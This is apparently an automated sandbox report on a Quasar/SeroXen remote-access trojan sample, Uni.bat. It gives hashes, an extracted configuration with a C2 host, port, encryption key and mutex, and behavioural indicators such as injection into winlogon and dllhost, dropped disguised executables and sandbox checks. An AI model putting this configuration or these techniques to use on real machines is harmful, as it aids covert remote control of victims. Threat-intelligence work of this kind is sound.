Analysis
max time kernel: 1200s
max time network: 1198s
platform: windows11-21h2_x64
resource: win11-20240419-en
resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 20-05-2024 16:14
Static task: static1
Behavioral task: behavioral1 (sample: Uni.bat; resource: win10-20240404-en)
Behavioral task: behavioral2 (sample: Uni.bat; resource: win10v2004-20240426-en)
Behavioral task: behavioral3 (sample: Uni.bat; resource: win11-20240419-en)
General
Target: Uni.bat
Size: 12.6MB
MD5: 898f49c739026123b6a3811fa31abe70
SHA1: 31ff6036b40d70d21cb1c4c0163cba0d4c720551
SHA256: 78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
SHA512: a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
SSDEEP: 49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i
Malware Config
Extracted
Family: quasar
Version: 1.0.0.0
Botnet: v2.2.5 | SeroXen
C2: kimsoylak.ddns.net:4782
Mutex: 2cc9d61f-950d-4f23-b7d5-45d9dda2f256
Attributes:
encryption_key: F467D794B2E1081B6AD1EAD5813AFA74F053248D
install_name: .exe
log_directory: $sxr-Logs
reconnect_delay: 1
Signatures
Modifies visibility of file extensions in Explorer (2 TTPs, 1 IoCs)
Processes: Explorer.EXE
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | Explorer.EXE
Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoCs)
Processes: Explorer.EXE
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | Explorer.EXE
Quasar payload (1 IoCs)
resource | yara_rule
behavioral3/memory/1360-64-0x00000224C1D30000-0x00000224C24FA000-memory.dmp | family_quasar
Suspicious use of NtCreateProcessExOtherParentProcess (3 IoCs)
Processes: WerFault.exe, WerFault.exe, WerFault.exe
description | pid | process | target process
PID 5536 created 5328 | 5536 | WerFault.exe | dllhost.exe
PID 6128 created 4844 | 6128 | WerFault.exe | dllhost.exe
PID 6064 created 5320 | 6064 | WerFault.exe | dllhost.exe
Suspicious use of NtCreateUserProcessOtherParentProcess (12 IoCs)
Processes: Uni.bat.exe, $sxr-powershell.exe, svchost.exe
description | pid | process | target process
PID 2624 created 632 | 2624 | Uni.bat.exe | winlogon.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
PID 2624 created 632 | 2624 | Uni.bat.exe | winlogon.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
PID 5036 created 5328 | 5036 | svchost.exe | dllhost.exe
PID 5036 created 4844 | 5036 | svchost.exe | dllhost.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
PID 5036 created 5320 | 5036 | svchost.exe | dllhost.exe
PID 1360 created 632 | 1360 | $sxr-powershell.exe | winlogon.exe
Deletes itself (1 IoCs)
Processes: Uni.bat.exe
pid | process
2624 | Uni.bat.exe
Executes dropped EXE (5 IoCs)
Processes: Uni.bat.exe, $sxr-mshta.exe, $sxr-cmd.exe, $sxr-powershell.exe, $sxr-powershell.exe
pid | process
2624 | Uni.bat.exe
2244 | $sxr-mshta.exe
4660 | $sxr-cmd.exe
1360 | $sxr-powershell.exe
3900 | $sxr-powershell.exe
Drops file in System32 directory (12 IoCs)
Processes: svchost.exe, OfficeClickToRun.exe, svchost.exe, DllHost.exe
description | ioc | process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | DllHost.exe
Suspicious use of SetThreadContext (18 IoCs)
Processes: Uni.bat.exe, $sxr-powershell.exe
description | pid | process | target process
PID 2624 set thread context of 2604 | 2624 | Uni.bat.exe | dllhost.exe
PID 2624 set thread context of 2452 | 2624 | Uni.bat.exe | dllhost.exe
PID 1360 set thread context of 4868 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 2156 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 3552 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 3044 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 2624 set thread context of 4672 | 2624 | Uni.bat.exe | dllhost.exe
PID 2624 set thread context of 1064 | 2624 | Uni.bat.exe | dllhost.exe
PID 1360 set thread context of 6024 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5056 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5264 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5328 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 4844 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5776 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5320 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 6124 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5224 | 1360 | $sxr-powershell.exe | dllhost.exe
PID 1360 set thread context of 5536 | 1360 | $sxr-powershell.exe | dllhost.exe
Drops file in Windows directory (7 IoCs)
Processes: Uni.bat.exe, WerFault.exe
description | ioc | process
File opened for modification | C:\Windows\$sxr-cmd.exe | Uni.bat.exe
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | WerFault.exe
File created | C:\Windows\$sxr-powershell.exe | Uni.bat.exe
File opened for modification | C:\Windows\$sxr-powershell.exe | Uni.bat.exe
File created | C:\Windows\$sxr-mshta.exe | Uni.bat.exe
File opened for modification | C:\Windows\$sxr-mshta.exe | Uni.bat.exe
File created | C:\Windows\$sxr-cmd.exe | Uni.bat.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
Processes: WerFault.exe
pid | pid_target | process | target process
4192 | 5328 | WerFault.exe | dllhost.exe
Checks processor information in registry (2 TTPs, 23 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WerFault.exe, WerFault.exe, svchost.exe, WerFault.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Enumerates system info in registry (2 TTPs, 6 IoCs)
Processes: WerFault.exe, WerFault.exe, WerFault.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Kills process with taskkill (1 IoCs)
Processes: taskkill.exe
pid | process
2284 | taskkill.exe
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS (57 IoCs)
Processes: OfficeClickToRun.exe, svchost.exe, svchost.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={453AF952-5678-4983-A91B-F7D586F23203}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 20 May 2024 16:19:24 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716221964" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Modifies registry class (40 IoCs)
Processes: Explorer.EXE, svchost.exe, $sxr-mshta.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 47a70b61d1aada01 | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5600310000000000b4584682100057696e646f777300400009000400efbec5522d60b45846822e000000a60500000000010000000000000000000000000000001f182301570069006e0064006f0077007300000016000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates | svchost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 1f721061d1aada01 | svchost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | $sxr-mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software | svchost.exe
